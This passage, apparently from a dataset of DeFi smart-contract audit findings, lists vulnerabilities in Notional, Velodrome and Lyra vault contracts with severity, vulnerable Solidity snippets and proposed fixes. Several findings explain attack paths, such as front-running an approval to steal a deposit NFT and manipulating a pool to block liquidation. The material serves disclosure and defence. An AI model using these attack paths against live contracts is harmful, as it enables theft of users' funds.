This leads to an array of issues such as users being liquidated prematurely or users being able to borrow more than they are allowed to.\\nIn Line 120, it calls the `getScalingFactors` function of the LinearPool to fetch the scaling factors of the LinearPool.\\nIn Line 123, it computes the final scaling factor of the wrapped token by multiplying the main token's decimal scaling factor with the wrapped token rate, which is incorrect.\\n```\\nFile: Boosted3TokenPoolMixin.sol\\n function _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n wrappedScaleFactor: wrappedScaleFactor,\\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n }\\n```\\n\\nThe correct way of calculating the final scaling factor of the wrapped token is to multiply the wrapped token's decimal scaling factor by the wrapped token rate as shown below:\\n```\\nscalingFactors[_wrappedIndex] = 
_scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n```\\n\\nThe `_scalingFactorWrappedToken` is the scaling factor that, when multiplied to a token amount, normalizes its balance as if it had 18 decimals. The `_getWrappedTokenRate` function returns the wrapped token rate.\\nIt is important to note that the decimal scaling factor of the main and wrapped tokens are not always the same. Thus, they cannot be used interchangeably.\\n```\\n // Scaling factors\\n\\n function _scalingFactor(IERC20 token) internal view virtual returns (uint256) {\\n if (token == _mainToken) {\\n return _scalingFactorMainToken;\\n } else if (token == _wrappedToken) {\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token\\n // increases in value.\\n return _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n } else if (token == this) {\\n return FixedPoint.ONE;\\n } else {\\n _revert(Errors.INVALID_TOKEN);\\n }\\n }\\n\\n /**\\n * @notice Return the scaling factors for all tokens, including the BPT.\\n */\\n function getScalingFactors() public view virtual override returns (uint256[] memory) {\\n uint256[] memory scalingFactors = new uint256[](_TOTAL_TOKENS);\\n\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n scalingFactors[_mainIndex] = _scalingFactorMainToken;\\n scalingFactors[_wrappedIndex] = _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n scalingFactors[_BPT_INDEX] = FixedPoint.ONE;\\n\\n return scalingFactors;\\n }\\n```\\n","There is no need to manually calculate the final scaling factor of the wrapped token again within the code. This is because the wrapped token scaling factor returned by the `LinearPool.getScalingFactors()` function already includes the token rate. 
Refer to the Balancer's source code above for referen\\n```\\nfunction _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n// Remove the line below\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n// Remove the line below\\n // value.\\n// Remove the line below\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n// Remove the line below\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n// Remove the line below\\n wrappedScaleFactor: wrappedScaleFactor,\\n// Add the line below\\n wrappedScaleFactor: underlyingScalingFactors[wrappedIndex], \\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n}\\n```\\n","Within the Boosted 3 leverage vault, the balances are scaled before passing them to the stable math function for computation since the stable math function only works with balances that have been normalized to 18 decimals. 
If the scaling factor is incorrect, all the computations within the leverage vault will be incorrect, which affects almost all the vault functions.\\nFor instance, the `Boosted3TokenAuraVault.convertStrategyToUnderlying` function relies on the wrapped scaling factor for its computation under the hood. This function is utilized by Notional's `VaultConfiguration.calculateCollateralRatio` function to determine the value of the vault share when computing the collateral ratio. If the underlying result is wrong, the collateral ratio will be wrong too, and this leads to an array of issues such as users being liquidated prematurely or users being able to borrow more than they are allowed to.","```\\nFile: Boosted3TokenPoolMixin.sol\\n function _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n wrappedScaleFactor: wrappedScaleFactor,\\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n 
});\\n }\\n```\\n" +"Boosted3TokenPoolUtils.sol : _redeem - updating the `totalBPTHeld , totalStrategyTokenGlobal` after `_unstakeAndExitPool` is not safe",medium,"_redeem function is used to claim the BPT amount using the strategy tokens.\\nIt is first calling the `_unstakeAndExitPool` function and then updating the `totalBPTHeld , totalStrategyTokenGlobal`\\n```\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n\\n if (bptClaim == 0) return 0;\\n\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n\\nFirst _unstakeAndExitPool is called and then totalBPTHeld and totalStrategyTokenGlobal are updated.",First update `totalBPTHeld and totalStrategyTokenGlobal` and then call the `_unstakeAndExitPool`,"Reentering during any of the function call inside `_unstakeAndExitPool` could be problematic. 
`stakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false)` `BalancerUtils._swapGivenIn`\\nIt needs deeper study to analyze the impact, but I would suggest updating the balance first and then calling the `_unstakeAndExitPool`","```\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n\\n if (bptClaim == 0) return 0;\\n\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n" +Unable to deploy new leverage vault for certain MetaStable Pool,medium,"Notional might have an issue deploying the new leverage vault for a MetaStable Pool that does not have Balancer Oracle enabled.\\n```\\nFile: MetaStable2TokenVaultMixin.sol\\nabstract contract MetaStable2TokenVaultMixin is TwoTokenPoolMixin {\\n    constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n        TwoTokenPoolMixin(notional_, params)\\n    {\\n        // The oracle is required for the vault to behave properly\\n        (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n            IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n        require(oracleEnabled);\\n    }\\n```\\n","Remove the Balancer Oracle check from the constructor.\\n```\\n    constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n        TwoTokenPoolMixin(notional_, params)\\n    {\\n// Remove the line below\\n        // The oracle is required for the vault to behave properly\\n// Remove the line below\\n        (/* */, /* 
*/, /* */, /* */, bool oracleEnabled) = \\n// Remove the line below\\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n// Remove the line below\\n require(oracleEnabled);\\n }\\n```\\n","Notional might have an issue deploying the new leverage vault for a MetaStable Pool that does not have Balancer Oracle enabled. Since Balancer Oracle has been deprecated, the Balancer Oracle will likely be disabled on the MetaStable Pool.","```\\nFile: MetaStable2TokenVaultMixin.sol\\nabstract contract MetaStable2TokenVaultMixin is TwoTokenPoolMixin {\\n constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n TwoTokenPoolMixin(notional_, params)\\n {\\n // The oracle is required for the vault to behave properly\\n (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n require(oracleEnabled);\\n }\\n```\\n" +Possible division by zero depending on `TradingModule.getOraclePrice` return values,medium,"Some functions depending on `TradingModule.getOraclePrice` accept non-negative (int256 `answer`, int256 decimals) return values. In case any of those are equal to zero, division depending on `answer` or `decimals` will revert. In the worst case scenario, this will prevent the protocol from continuing operating.\\nThe function `TradingModule.getOraclePrice` properly validates that return values from Chainlink price feeds are positive.\\nNevertheless, `answer` may currently return zero, as it is calculated as `(basePrice * quoteDecimals * RATE_DECIMALS) / (quotePrice * baseDecimals);`, which can be truncated down to zero, depending on base/quote prices [1]. 
Additionally, `decimals` may in the future return zero, depending on changes to the protocol code, as the NatSpec states that this is a `number of `decimals` in the rate, currently hardcoded to 1e18` [2].\\nIf any of these return values are zero, calculations that use division depending on `TradingModule.getOraclePrice` will revert.\\nMore specifically:\\n[1]\\n1.1 `TradingModule.getLimitAmount`\\n```\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n```\\n\\nthat calls `TradingUtils._getLimitAmount`, which reverts if `oraclePrice` is `0`\\n```\\n oraclePrice = (oracleDecimals * oracleDecimals) / oraclePrice;\\n```\\n\\n[2] 2.1 `TwoTokenPoolUtils._getOraclePairPrice`\\n```\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n```\\n\\n2.2 `TradingModule.getLimitAmount`\\n```\\n require(oracleDecimals >= 0); /// @dev Chainlink decimals error\\n```\\n\\nthat calls `TradingUtils._getLimitAmount`, which reverts if `oracleDecimals` is `0`\\n```\\n limitAmount =\\n ((oraclePrice + \\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) / \\n oracleDecimals;\\n```\\n\\n2.3 `CrossCurrencyfCashVault.convertStrategyToUnderlying`\\n```\\n return (pvInternal * borrowTokenDecimals * rate) /\\n (rateDecimals * int256(Constants.INTERNAL_TOKEN_PRECISION));\\n```\\n","Validate that the return values are strictly positive (instead of non-negative) in case depending function calculations may result in division by zero. 
This can be either done on `TradingModule.getOraclePrice` directly or on the depending functions.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/trading/TradingModule.sol b/contracts/trading/TradingModule.sol\\nindex bfc8505..70b40f2 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/trading/TradingModule.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/trading/TradingModule.sol\\n@@ // Remove the line below\\n251,6 // Add the line below\\n251,9 @@ contract TradingModule is Initializable, UUPSUpgradeable, ITradingModule {\\n (basePrice * quoteDecimals * RATE_DECIMALS) /\\n (quotePrice * baseDecimals);\\n decimals = RATE_DECIMALS;\\n// Add the line below\\n\\n// Add the line below\\n require(answer > 0); /// @dev Chainlink rate error\\n// Add the line below\\n require(decimals > 0); /// @dev Chainlink decimals error\\n }\\n \\n function _hasPermission(uint32 flags, uint32 flagID) private pure returns (bool) {\\n@@ // Remove the line below\\n279,9 // Add the line below\\n282,6 @@ contract TradingModule is Initializable, UUPSUpgradeable, ITradingModule {\\n // prettier// Remove the line below\\nignore\\n (int256 oraclePrice, int256 oracleDecimals) = getOraclePrice(sellToken, buyToken);\\n \\n// Remove the line below\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n// Remove the line below\\n require(oracleDecimals >= 0); /// @dev Chainlink decimals error\\n// Remove the line below\\n\\n limitAmount = TradingUtils._getLimitAmount({\\n tradeType: tradeType,\\n sellToken: sellToken,\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol b/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\nindex 4954c59..6315c0a 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n 
a/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\n@@ // Remove the line below\\n76,10 // Add the line below\\n76,7 @@ library TwoTokenPoolUtils {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n// Remove the line below\\n require(rate > 0);\\n// Remove the line below\\n require(decimals >= 0);\\n \\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n```\\n","In the worst case, the protocol might stop operating.\\nAlbeit unlikely that `decimals` is ever zero, since currently this is a hardcoded value, it is possible that `answer` might be zero due to round-down performed by the division in `TradingModule.getOraclePrice`. This can happen if the quote token is much more expensive than the base token. In this case, `TradingModule.getLimitAmount` and depending calls, such as `TradingModule.executeTradeWithDynamicSlippage` might revert.",```\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n```\\n +Malicious user can DOS pool and avoid liquidation by creating secondary liquidity pool for Velodrome token pair,high,"For every Vault_Velo interaction the vault attempts to price the liquidity of the user. This calls priceLiquidity in the corresponding DepsoitReciept. The prices the underlying assets by swapping them through the Velodrome router. Velodrome can have both a stable and volatile pool for each asset pair. When calling the router directly it routes through the pool that gives the best price. In priceLiquidity the transaction will revert if the router routes through the wrong pool (i.e. trading the volatile pool instead of the stable pool). A malicious user can use this to their advantage to avoid being liquidated. 
They could manipulate the price of the opposite pool so that any call to liquidate them would route through the wrong pool and revert.\\n```\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n require(stablePool == stable, ""pricing occuring through wrong pool"" );\\n```\\n\\nDepositReceipt uses the getAmountOut call the estimate the amountOut. The router will return the best rate between the volatile and stable pool. If the wrong pool give the better rate then the transaction will revert. Since pricing is called during liquidation, a malicious user could manipulate the price of the wrong pool so that it returns the better rate and always reverts the liquidation call.","Instead of quoting from the router, query the correct pool directly:\\n```\\n uint256 amountOut; //amount received by trade\\n- bool stablePool; //if the traded pool is stable or volatile.\\n\\n- (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n- require(stablePool == stable, ""pricing occuring through wrong pool"" );\\n+ address pair;\\n\\n+ pair = router.pairFor(token1, USDC, stable)\\n+ amountOut = IPair(pair).getAmountOut(HUNDRED_TOKENS, token1)\\n```\\n",Malicious user can avoid liquidation,"```\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n require(stablePool == stable, ""pricing occuring through wrong pool"" );\\n```\\n" +Users are unable close or add to their Lyra vault positions when price is stale or circuit breaker is tripped,high,"Users are unable close or add to their Lyra vault positions when price is stale or circuit breaker is tripped. This is problematic for a few reasons. 
First is that the circuit breaker can be tripped indefinitely which means their collateral could be frozen forever and they will be accumulating interest the entire time they are frozen. The second is that since they can't add any additional collateral to their loan, the loan may end up being underwater by the time the price is no longer stale or circuit breaker is no longer tripped. They may have wanted to add more assets and now they are liquidated, which is unfair as users who are liquidated are effectively forced to pay a fee to the liquidator.\\n```\\nfunction _checkIfCollateralIsActive(bytes32 _currencyKey) internal view override {\\n \\n //Lyra LP tokens use their associated LiquidityPool to check if they're active\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n bool isStale;\\n uint circuitBreakerExpiry;\\n //ignore first output as this is the token price and not needed yet.\\n (, isStale, circuitBreakerExpiry) = LiquidityPool.getTokenPriceWithCheck();\\n require( !(isStale), ""Global Cache Stale, can't trade"");\\n require(circuitBreakerExpiry < block.timestamp, ""Lyra Circuit Breakers active, can't trade"");\\n}\\n```\\n\\nThe above lines are run every time a user a user tries to interact with the vault. Currently this is overly restrictive and can lead to a lot of undesired situations, as explained in the summary.","The contract is frozen when price is stale or circuit breaker is tripped to prevent price manipulation. While it should restrict a majority of actions there are a two that don't need any price validation. If a user wishes to close out their entire loan then there is no need for price validation because the user has no more debt and therefore doesn't need to maintain any level of collateralization. The other situation is if a user adds collateral to their vault and doesn't take out any more loans. 
In this scenario, the collateralization can only increase, which means that price validation is not necessary.\\nI recommend the following changes to closeLoan:\\n```\\n- _checkIfCollateralIsActive(currencyKey);\\n uint256 isoUSDdebt = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n require( isoUSDdebt >= _USDToVault, ""Trying to return more isoUSD than borrowed!"");\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n+ //only need to check collateral value if user has remaining debt\\n+ _checkIfCollateralIsActive(currencyKey);\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n\\nI recommend removing liquidation threshold check from increaseCollateralAmount:\\n```\\n //debatable check begins here \\n- uint256 totalCollat = collateralPosted[_collateralAddress][msg.sender] + _colAmount;\\n- uint256 colInUSD = priceCollateralToUSD(currencyKey, totalCollat);\\n- uint256 USDborrowed = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n- uint256 borrowMargin = (USDborrowed * liquidatableMargin) / LOAN_SCALE;\\n- require(colInUSD >= borrowMargin, ""Liquidation margin not met!"");\\n //debatable check ends here\\n```\\n","Frozen assets, unfair interest accumulation and unfair liquidations","```\\nfunction _checkIfCollateralIsActive(bytes32 _currencyKey) internal view override {\\n \\n //Lyra LP tokens use their associated LiquidityPool to check if they're active\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n bool isStale;\\n uint 
circuitBreakerExpiry;\\n //ignore first output as this is the token price and not needed yet.\\n (, isStale, circuitBreakerExpiry) = LiquidityPool.getTokenPriceWithCheck();\\n require( !(isStale), ""Global Cache Stale, can't trade"");\\n require(circuitBreakerExpiry < block.timestamp, ""Lyra Circuit Breakers active, can't trade"");\\n}\\n```\\n" +Anyone can withdraw user's Velo Deposit NFT after approval is given to depositor,high,"`Depositor#withdrawFromGauge` is a public function that can be called by anyone which transfers token to `msg.sender`. `withdrawFromGauge` burns the NFT to be withdrawn, which means that `Depositor` must either be approved or be in possession of the NFT. Since it doesn't transfer the NFT to the contract before burning the user must either send the NFT to the `Depositor` or `approve` the `Depositor` in a separate transaction. After the NFT is either transferred or approved, a malicious user could withdraw the NFT for themselves.\\n```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n\\n`Depositor#withdrawFromGauge` allows anyone to call it, burning the NFT and sending `msg.sender` the withdrawn tokens.\\n```\\nfunction burn(uint256 _NFTId) external onlyMinter{\\n require(_isApprovedOrOwner(msg.sender, _NFTId), ""ERC721: caller is not token owner or approved"");\\n delete pooledTokens[_NFTId];\\n delete relatedDepositor[_NFTId];\\n _burn(_NFTId);\\n}\\n```\\n\\n`Depositor` calls `DepositReceipt_Base#burn`, which means that it must be either the owner or approved for the NFT. 
Since `Depositor#withdrawFromGauge` doesn't transfer the NFT from the user, this must happen in a separate transaction. Between the user approval/transfer and them calling `Depositor#withdrawFromGauge` a malicious user could call `Depositor#withdrawFromGauge` first to withdraw the NFT and steal the users funds. This would be very easy to automate with a bot.\\nExample: `User A` deposits 100 underlying into their `Depositor` and is given `Token A` which represents their deposit. After some time they want to redeem `Token A` so they `Approve` their `Depositor` for `Token A`. `User B` sees the approval and quickly calls `Depositor#withdrawFromGauge` to withdraw `Token A`. `User B` is sent the 100 tokens and `Token A` is burned from `User A`.","Only allow owner of NFT to withdraw it:\\n```\\n function withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n+ require(depositReceipt.ownerOf(_NFTId) == msg.sender);\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n }\\n```\\n",Users attempting to withdraw can have their funds stolen,"```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n" +Swapping 100 tokens in DepositReceipt_ETH and DepositReciept_USDC breaks usage of WBTC LP and other high value tokens,high,"DepositReceipt_ETH and DepositReciept_USDC checks the value of liquidity by 
swapping 100 tokens through the swap router. WBTC is a good example of a token that will likely never work as LP due to the massive value of swapping 100 WBTC. This makes DepositReceipt_ETH and DepositReciept_USDC revert during slippage checks after calculating amount out. As of the time of writing this, WETH also experiences a 11% slippage when trading 100 tokens. Since DepositReceipt_ETH only supports 18 decimal tokens, WETH/USDC would have to use DepositReciept_USDC, resulting in WETH/USDC being incompatible. The fluctuating liquidity could also make this a big issue as well. If liquidity reduces after deposits are made, user deposits could be permanently trapped.\\n```\\n //check swap value of 100tokens to USDC to protect against flash loan attacks\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n```\\n\\nThe above lines try to swap 100 tokens from token1 to USDC. In the case of WBTC 100 tokens is a monstrous amount to swap. 
Given the low liquidity on the network, it simply won't function due to slippage requirements.\\n```\\nfunction _priceCollateral(IDepositReceipt depositReceipt, uint256 _NFTId) internal view returns(uint256){ \\n uint256 pooledTokens = depositReceipt.pooledTokens(_NFTId); \\n return( depositReceipt.priceLiquidity(pooledTokens));\\n}\\n\\nfunction totalCollateralValue(address _collateralAddress, address _owner) public view returns(uint256){\\n NFTids memory userNFTs = loanNFTids[_collateralAddress][_owner];\\n IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 totalPooledTokens;\\n for(uint256 i =0; i < NFT_LIMIT; i++){\\n //check if each slot contains an NFT\\n if (userNFTs.ids[i] != 0){\\n totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n }\\n }\\n return(depositReceipt.priceLiquidity(totalPooledTokens));\\n}\\n```\\n\\nOne of the two functions above are used to price LP for every vault action on Vault_Velo. If liquidity is sufficient when user deposits but then drys up after, the users deposit would be permanently trapped in the in the vault. In addition to this liquidation would also become impossible causing the protocol to assume bad debt.\\nThis could also be exploited by a malicious user. First they deposit a large amount of collateral into the Velodrome WBTC/USDC pair. They take a portion of their LP and take a loan against it. Now they withdraw the rest of their LP. Since there is no longer enough liquidity to swap 100 tokens with 5% slippage, they are now safe from liquidation, allowing a risk free loan.","Change the number of tokens to an immutable, so that it can be set individually for each token. Optionally you can add checks (shown below) to make sure that the number of tokens being swapped will result in at least some minimum value of USDC is received. 
Similar changes should be made for DepositReceipt_ETH:\\n```\\nconstructor(string memory _name, \\n string memory _symbol, \\n address _router, \\n address _token0,\\n address _token1,\\n uint256 _tokensToSwap,\\n bool _stable,\\n address _priceFeed) \\n ERC721(_name, _symbol){\\n\\n // rest of code\\n\\n if (keccak256(token0Symbol) == keccak256(USDCSymbol)){\\n require( IERC20Metadata(_token1).decimals() == 18, ""Token does not have 18dp"");\\n\\n+ (amountOut,) = _router.getAmountOut(_tokensToSwap, token1, USDC);\\n\\n+ //swapping tokens must yield at least 100 USDC\\n+ require( amountOut >= 1e8);\\n+ tokensToSwap = _tokensToSwap;\\n }\\n else\\n { \\n bytes memory token1Symbol = abi.encodePacked(IERC20Metadata(_token1).symbol());\\n require( keccak256(token1Symbol) == keccak256(USDCSymbol), ""One token must be USDC"");\\n require( IERC20Metadata(_token0).decimals() == 18, ""Token does not have 18dp"");\\n \\n+ (amountOut, ) = _router.getAmountOut(_tokensToSwap, token0, USDC);\\n\\n+ //swapping tokens must yield at least 100 USDC\\n+ require( amountOut >= 1e8);\\n+ tokensToSwap = _tokensToSwap;\\n }\\n```\\n",LPs that contain high value tokens will be unusable at best and freeze user funds or be abused at the worst case,"```\\n //check swap value of 100tokens to USDC to protect against flash loan attacks\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n```\\n" +Lyra vault underestimates the collateral value,medium,"Lyra vault subtracts the withdrawal fee while calculating the collateral value in USD, and it does not match the actual Lyra Pool implementation.\\nThe user's collateral value is estimated using the function `priceCollateralToUSD()` at `Vault_Lyra.sol#L77` as follows.\\n```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool 
associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice();\\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee\\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n\\nSo it is understood that the withdrawal fee is removed to get the reasonable value of the collateral. But according to the Lyra Pool implementation, the token price used for withdrawal is calculated using the function `_getTotalBurnableTokens`. And the function `_getTotalBurnableTokens` is as belows.\\n```\\nfunction _getTotalBurnableTokens()\\n internal\\n returns (\\n uint tokensBurnable,\\n uint tokenPriceWithFee,\\n bool stale\\n )\\n {\\n uint burnableLiquidity;\\n uint tokenPrice;\\n (tokenPrice, stale, burnableLiquidity) = _getTokenPriceAndStale();\\n\\n if (optionMarket.getNumLiveBoards() != 0) {\\n tokenPriceWithFee = tokenPrice.multiplyDecimal(DecimalMath.UNIT - lpParams.withdrawalFee);\\n } else {\\n tokenPriceWithFee = tokenPrice;//@audit withdrawalFee 